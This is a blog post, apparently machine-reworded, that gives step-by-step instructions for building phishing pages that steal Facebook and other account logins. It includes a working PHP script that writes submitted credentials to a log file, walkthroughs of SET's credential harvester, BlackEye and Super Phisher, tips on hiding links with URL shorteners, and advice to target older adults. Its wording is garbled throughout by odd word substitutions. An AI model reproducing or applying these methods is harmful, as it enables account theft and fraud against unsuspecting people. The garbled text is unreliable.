How To Set Up A Phishing Page
Last Updated on Apr 3, 2022 by Mikebush The Rich Lazy Asshole
Howdy, hustler? In that location is this disturbing hustler in my listing requesting how to create a phishing website. I tin can't conceal the secret anymore because a phishing webpage is an essential tool for whatsoever online hustle. One of the first stages of becoming a hacker is to learn to phish.
Hiring a web developer to design a phishing website is a BIG fault to avoid. The reason is that the developer will become aware of your secret. If the web developer is a freaking hustler, he might install viruses that will monitor your phishing activities. In brusque, it compromises the money you should bill the clients using your phishing website.
Fortunately, yous will learn how to create a phishing site with or without programming skills. Yes, in that location is no mistake in what you lot just read. You'll farther learn how to create a phishing website with your phone (iOS, HarmonyOS, or Windows) and how to brand a phishing site on Android.
What to Consider before you Create a Phishing Website
At that place are several methods regarding how to create a phishing website for billing. Withal, I welcome the pain to teach you many methods for creating a phishing website that works. This lesson is also important if yous also want to learn to hack a Facebook account
The lessons volition mainly comprehend:
- how to make a phishing site with 000webhost
- how to make a phishing webpage in Kali Linux
- how to create a phishing site using Android
Where necessary, I volition indicate how to make a phishing site on Android and other mobile operating systems. Understand that information technology is non every method for creating a phishing website that you will learn tin be possible with a mobile telephone. I will advise that you skip methods that require a PC if you have either Android, iOS, Windows, HarmonyOS, etc.
Note: I recommend Android over any other Os.
Platforms for Creating Webpage for Phishing
The two platforms we will use are:
- PC
- Mobile phone
For like shooting fish in a barrel understanding, I will indicate when a method is possible with a phone. If it applies to PC simply, I will likewise indicate for y'all.
So, how can I create a phishing website that works?
How to Create a Phishing Website
- Method i: How to Make a Phishing Site with 000webhost
- Method two: How to Brand a Phishing Webpage in Kali Linux
- Method 3: how to create a phishing site using Android
- Method 4: Create a Phishing Website Using Super Phisher
Method 1: How to Make a Phishing Site with 000webhost
Regarding how to create a phishing website, 000webhost is one of the prestigious methods. This method also regards how to make a phishing site using a notepad. It requires a PC for the all-time feel. Nonetheless, you lot tin apply an Android phone, only information technology must have at least iii gigabytes of RAM storage.
Webhost Cpanel Login
Identify the Target Website and Download the HTML Index
For this guide, nosotros are creating a phishing website out of www.facebook.com.
For Android
- Download Naked Browser LTS from Google Play Store
- Visit facebook.com
- Swipe your screen to the right.
- Click View Folio Source.
Yous should now meet the source lawmaking of facebook.com. Nobody knows that source code is viewable with a mobile phone. So, try to continue my clandestine a secret.
For PC
- Install Firefox or Chrome
- Visit Facebook.com.
- Right-click and select View Source. In some browsers like Firefox, you will see View Source Element.
Your browser volition split-display, and what you observe on the right or left side of your screen is the HTML source code of the Facebook webpage. If yous are using the Naked Browser LTS for Android, the source lawmaking will open in a new tab.
Copy the HTML Source Code
Y'all now have to select and re-create the unabridged text. This method is purely how to make a phishing site using notepad because it requires either the notepad or WordPad awarding to exist successful.
For Android
- Download FX file manager.
- Launch the app and Media Card.
- Click the options button at the top-right screen.
- Click File.
- Click Text.
- Name the file as index.html.
- Paste the Facebook HTML source lawmaking.
You at present have to use someone'southward PC and catechumen the alphabetize.html file to Unicode using Windows Explorer. Simply click on Salvage As and set the encoding to Unicode.
For PC
- Install a Notepad (recommended) or WordPad.
- Launch the Notepad and paste the HTML source code.
- Click Salve As.
- Proper noun the file as alphabetize.html.
- Set up Relieve as type every bit All Files and set Encoding as Unicode.
Create the Password PHP File
This phase is the main deal regarding how to create a phishing page of any website. It is where every Facebook client login password will go for phishing to exist successful. Since you have no programming knowledge, copy the code below.
<?php
header ('Location: facebook.com ');
$handle = fopen("log.txt", "a");
foreach($_POST every bit $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\northward");
}
fwrite($handle, "\r\northward\north\n\n");
fclose($handle);
exit;
?>
Now, paste this lawmaking in your Notepad (PC user) or create a new .txt file using Android (mobile users). Use post.php as the file name and select Unicode for the encoding format.
Merge the PHP File with the HTML Source Lawmaking File
Apropos how to create a phishing web, if we do not integrate the PHP file in the HTML file, phishing won't piece of work. If yous are using an Android phone, download a PC Keyboard from
What do nosotros exercise? Below are the steps to integrate the PHP keyword picker in the HTML.
-
Launch the HTML file with your browser.
-
Click Ctrl F.
-
Input "=action" in the provided space.
-
You should run into an underlined part of the codes. Select and replace the portion with "post.php."
If you are creating a phishing website from a site other than Facebook, the method volition not be the aforementioned. However, you can access the login of that site by doing the post-obit:
- Open the website.
- Click Login.
- Right-click and view page source. You should find something similar to what we have for Facebook in this commodity (=action).
Host the PHP File Online with 000webhost
In case you lot are wondering what "hosting" ways, it is simply the human action of making the phishing website available online. Without hosting the PHP file, clients will not admission the website, and y'all will not phish passwords. Do the following to host the files on 000webhost.
- Visit 000.webhost.com.
- Sign up for gratuitous and confirm your e-mail accost.
- Click Upload Files Now.
- Select the Public_html binder and click the upload icon in the toolbar.
- Click Select Files and select the PHP file.
- Striking Upload, and your files volition upload to the servers.
Notation: I accept tested the gratis hosting from 000webhost, and it is quite tiresome with several downtimes.
You lot have to change the permission to 777 and tick all the boxes in the screen prompt. Finally, close the FTP server and re-create down your web accost.
Host the Phishing Page
Regarding how to make a imitation website for phishing, information technology is fourth dimension to host the phishing webpage. Below are the proper steps towards hosting the phishing page every bit someone without programming skills.
- Locate the login form in the index.html file. You can utilise source code to find the actual location for the website you are phishing.
- Replace the "mail.php" with http://yourwebsiteforyourpostphpupload/post.php.
Note: If y'all uploaded to the root folder of your spider web host directory, add http:// just in front of the site.
If you lot are not sure whether you added, you tin can test past navigating to http://yourwebsiteforyourpostphpupload/postal service.php. If it redirects to the website you are phishing, you are good to get. In the example of this commodity, it volition redirect the states to www.facebook.com. If there are issues, ostend whether y'all uploaded it to the file to the right directory. If everything is successful, copy and paste the index.html text in world wide web.htmlpasta.com. Complete the Google reCAPTCHA challenge and click Paste. The activeness will automatically generate a link for the phishing website you are creating.
Examination the Website
Visit the phishing website yous just created and effort to login with whatever Facebook login detail. When you lot click login, it should redirect you to www.facebook.com. If there is no redirection, there is a problem. After all, the principle regarding how to create a phishing page step by step is that you lot remain circumspect per step.
If information technology logs in correctly, navigate to your FTP server, and you should find a Log.txt file. In this guide, the Log.txt file is present where we take the postal service.php file. Open up the Log.txt file, and you should find the Facebook login details you attempted in the frontend (the user-accessible login page). Guess what? Your phishing website is prepare with the aid of 000webhost! Share the link with targets you lot want to phish. You can likewise practice Facebook phishing to hack a Facebook account successfully.
Method 2: How to Make a Phishing Webpage in Kali Linux
This method concerns how to brand a phishing webpage in Kali Linux. Unfortunately, mobile users volition be unable to create a phishing webpage using this method. The reason is that Kali Linux will not run on mobile. Even if in that location is a way to run the Kali Linux on mobile, the feel will not be skillful. And so, let's see how to create a phishing webpage combining Kali Linux and the credential harvester.
#Requirements
- Kali Linux
- Social Engineering Toolkit (preinstall in Kali Linux)
- Target phishing website URL.
For this guide regarding how to create a phishing website, we will create a phishing page for world wide web.facebook.com. The procedure is the aforementioned, still the website you prefer to utilize for the phishing creation.
Launch the Terminal in Kali
First, open the terminal window in Kali and exist sure to take root access. If yous are a non-root user, type sudo root and enter your password. From the Application options, click the dropdown and select Kali Linux > Exploitation Tools > Social Engineering Toolkit > Setoolkit.
If you are a root user, only type setoolkit in the command line. A alert message volition appear informing you that this tool is to be used with company authorization or for educational purposes only. The terms of service will be violated if you utilize it for malicious purposes. Well, since you will be using it for a malicious purpose, you lot are already violating the terms of service.
Anyhow, type "Y" to concur to the terms and conditions of using the tool. Y stands for yeah.
Social Technology Attack
Still, on how to create a phishing page pace by pace, it'due south fourth dimension to play around with the Social Engineering Toolkit. Bear in mind that the essence of this method is to capture user logins, and the Social Engineering Toolkit is the password harvester. Let's go on!
A menu volition come up up after you insert the "Y" command. Exercise the following:
- Input 1.
- Input 3 to select Credential Harvester Attack Method.
At this point, you lot are presented with options to either clone a page for phishing or create a malicious phishing page. For this guide on how to create a simple phishing page, we will select the cloning option for facebook.com.
- Input 2 to select Site Cloner.
Notation: You have to be patient considering information technology volition take time for the Social Engineering science Toolkit to clone Facebook. Information technology might accept even longer for weak PCs.
Ready IP Address for Countersign Harvesting
Open up a new terminal and blazon in ifconfig. Look for 'inet' and re-create the IP address you discover at that place. Social Applied science Toolkit will request for the IP address to store the credentials it volition capture. Simply paste the IP accost you copied in the recent terminal.
Input Your Phishing Website
Enter the site you want to use for creating a phishing page. Note that we use facebook.com in this step past step guide for creating a phishing website. Social Engineering Toolkit will request Apache Server to run while phished data is written to Apache root directory. Input "Y" to permit and the phishing setup for facebook.com is complete.
Facebook.com is now hosted, and your phishing page is agile. So, you tin at present share with the targets you lot desire to phish. Simply then, there is a picayune trouble. Clients become suspicious and will not want to use the IP to login to Facebook. Fortunately, there is a solution; what do you do?
You crave a link shortening service to conceal the malicious login link earlier sending it to phishing targets. Some of the link shortening service providers are:
- bitly.com/
- rebrandly.com/
- ClickMeter
- TinyURL
- Shorturl
- T2M
- Cutt.ly
Re-create your IP address as http://yourIPaddress and paste in any of the link shortening services. It should look similar http://72.229.28.185. Click the shorten URL, and the IP link volition modify to a unique URL that will redirect credentials to yous.
Share the link as Email, text message, social media message, etc. You can increase your phishing chances by targeting older adults or convincing young users to login via the link. Simply tell them that it is the new manner of accessing Facebook or the phishing site you utilize for free.
Finally, locate the login details by clicking Dwelling house > Root > Var > World wide web. Click on the HTML or .txt file for a list of passwords from people that use the link to access their accounts.
Method 3: How to Create a Phishing Website with Your Phone
This method is a special method because I'm enlightened that about fifty% of hustlers have no PC. It requires your telephone and BlackEye application. The BlackEye app I take supports phishing on 32 websites. Some of the websites include GitHub, Protonmail, Facebook, Shopify, Twitter, PayPal, Google, Gitlab, Adobe, MySpace, Pinterest, Verizon, etc.
Usually, BlackEye is about functional using Kali Linux concerning how to create a phishing page of any website. However, we tin install the relevant commands on an Ubuntu or Debian device. Only update the Kali distro, and y'all install BlackEye.
Note: We are using facebook.com for this guide to create the phishing page.
Download BlackEye
Before downloading BlackEye, clone the source from the GitHub repository. How do yous clone the source correctly?
Open a concluding window and input the control codes beneath.
~$ git clone https://github.com/thelinuxchoice/blackeye
Cloning into 'blackeye'…
remote: Enumerating objects: 361, done.
remote: Total 361 (delta 0), reused 0 (delta 0), pack-reused 361
Receiving objects: 100% (361/361), 8.01 MiB | three.17 MiB/s, done.
Resolving deltas: 100% (101/101), done.
~$ cd blackeye
~/blackeye$
The command to a higher place will install and activate the BlackEye repository. Go to the blackeye binder and run the bash blackeye.sh command. Beneath is what you should see:
~/blackeye$ fustigate blackeye.sh :: Disclaimer: Developers assume no liability and are non :: :: responsible for whatever misuse or damage caused by BlackEye. :: :: But apply for educational purporses!! :: :: Attacking targets without mutual consent is illegal! :: [01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1[02] Facebook [18] eBay[03] Snapchat [19] Pinterest[04] Twitter [xx] CryptoCurrency[05] Github [21] Verizon[06] Google [22] DropBox[07] Spotify [23] Adobe ID[08] Netflix [24] Shopify[09] PayPal [25] Messenger[x] Origin [26] GitLab[11] Steam [27] Twitch[12] Yahoo [28] MySpace[13] Linkedin [29] Badoo[14] Protonmail [30] VK[15] WordPress [31] Yandex[sixteen] Microsoft [32] devianART
Modify Facebook.com Page
Right-click and click on the "View Page source"
Facebook.com will bear witness an expired copyright detect. If you do not like that, render to the blackeye folder from the bash script and blazon Is. Typing Is will display the sites folder in the BlackEye repository.
~/blackeye$ ls blackeye.sh LICENSE README.doctor sites
With the cd sites control, you can still navigate to the sites folder and then reveal the sites by entering Is control. Y'all can then choose the template site to modify for the phishing. For this guide, facebook.com is our interest.
~/blackeye$ cd sites~/blackeye/sites$ ls adobe cryptocurrency facebook google linkedin myspace paypal shopify spotify twitter wordpressbadoo devianart github instafollowers messenger netflix pinterest shopping steam verizon yahoocreate dropbox gitlab instagram microsoft origin protonmail snapchat twitch vk yandex
For you to edit Facebook, retype Is to access the files. It will be similar to the source code below:
~/blackeye/sites$ cd facebook~/blackeye/sites/facebook$ ls index_files index.php ip.php ip.txt login.html login.php saved.ip.txt saved.usernames.txt
Now, edit the HTML source lawmaking of facebook.com using any text editor from the app store. Simply open login.html, and you should discover the source code for the Facebook login page.
Build the Facebook.com Phishing Page
Practise the following:
- Open a new terminal window.
- Navigate to the blackeye folder.
- Run bash blackeye.sh.
- Return to the pick menu of the phishing page where you have a list of phishing websites.
- Equally you can see in the source code below, Facebook is number 2, and then you accept to select 02 and press enter.
~/blackeye/sites/protonmail$ cd~$ cd blackeye~/blackeye$ bash blackeye.sh [01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1[02] Facebook [18] eBay[03] Snapchat [19] Pinterest[04] Twitter [twenty] CryptoCurrency[05] Github [21] Verizon[06] Google [22] DropBox[07] Spotify [23] Adobe ID[08] Netflix [24] Shopify[09] PayPal [25] Messenger[10] Origin [26] GitLab[eleven] Steam [27] Twitch[12] Yahoo [28] MySpace[13] Linkedin [29] Badoo[fourteen] Protonmail [thirty] VK[fifteen] WordPress [31] Yandex[sixteen] Microsoft [32] devianART [*] Choose an option: 18
Later selecting Facebook as a phishing website, the terminal will request an IP accost. Input your IP address, printing enter, and you lot will run across something similar to what we have below.
[*] Put your local IP (Default 10.0.6.27): [*] Starting php server…[*] Send this link to the Victim: 72.229.28.185[*] Waiting victim open the link …
You can at present navigate to facebook.com for the issue of your phishing setup.
Capture the Countersign on Facebook
Now, you lot can share the link to targets and convince them to use the link.
[*] Waiting victim open the link … [*] IP Constitute![*] Victim IP: 72.229.28.185[*] User-Agent: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:sixty.0) Gecko/20100101 Firefox/lx.0[*] Saved: shopping/saved.ip.txt
The moment your target uses the link to login to facebook.com, BlackEye reports the username, as you can see below.
[*] Waiting credentials … [*] Credentials Found![*] Account: smartlazyhustler[*] Password: thesmartlazyhustler1997[*] Saved: sites/shopping/saved.usernames.txt
The merely downside with this method is that it will non work if the target uses 2FA security on his/her account.
Method 4: Create a Phishing Website Using Super Phisher
Super Phisher is a elementary tool that phishers do not use very ofttimes. It is a straightforward tool to utilize, and I'll chop-chop highlight things to practise to create a unique phishing site.
#Requirements
- Super Phisher
- PC
Note: We are using facebook.com for the sake of this phishing website guide.
Download and Extract Super Phisher
I tin can't include the download link here for obvious reasons. After downloading the Super Phisher, extract the files and launch Super Phisher.
Consummate the Super Phisher Form
Enter https://www.facebook.com in the URL of Login Page department.
For Name of Log File, you can input any proper name (name.txt) that you will think (it is where the logins volition be saved).
Use the PHP file proper noun for the Name of PHP File section.
Enter https://world wide web.facebook.com in Site to Redirect To.
Click Build Phisher. Clicking the Build Phisher volition generate ii output files in the output folder.
Create a Webhosting Business relationship
You need to host the files with web hosts that support FTP. I recommend hosting services like t35.com and byethost.com. Y'all tin can also search for free host services if you don't want to spend them. Also, annotation that free hosting makes your phishing website ho-hum and unstable.
Notation: If you exercise not know how to create a web hosting business relationship, you can transport me a request email for a hosting account.
Host the Phishing Files
Become to Super Phisher and upload the two files y'all observe there to your webhost. Make sure to upload both files to public_html.
From there, you can expect for your phishing page URL. If you can't find the URL, copy the source code in an HTML file and paste it to www.htmlpasta.com. Complete the reCAPTCHA challenge, and you lot will encounter your URL.
Share the phishing link with people you want to phish. Once they employ the link to login to Facebook, their login details will exist saved to your web account. Navigate to the Log.txt file in your hosting account and call back the Facebook login details.
Top 10 Websites to Utilize for Phishing
- Netflix
- Chase
- Yahoo
- PayPal
- Apple
- Microsoft
- Amazon
- eBay
NOTE
I exercise not include download links in my articles for obvious reasons.
Conclusion
And so, here is all regarding how to create a phishing page stride past step. The heady thing is that I have painstakingly explained this guide for those without any programming skills. I bet you can't find whatsoever improve guide out in that location unless you wish to spend your data.
If you notice it difficult to follow upwardly, then rent a spider web developer to do the job. But like I mentioned earlier, it is unsafe to rent a developer for your phishing website. Lest I forget, you can also create a phishing e-commerce website to phish credit card details. However, that'south a story for another day.
Phish Safely…
How To Set Up A Phishing Page,
Source: https://smartlazyhustler.com/how-to-create-a-phishing-website/
Posted by: jamesinectelithe.blogspot.com
0 Response to "How To Set Up A Phishing Page"
Post a Comment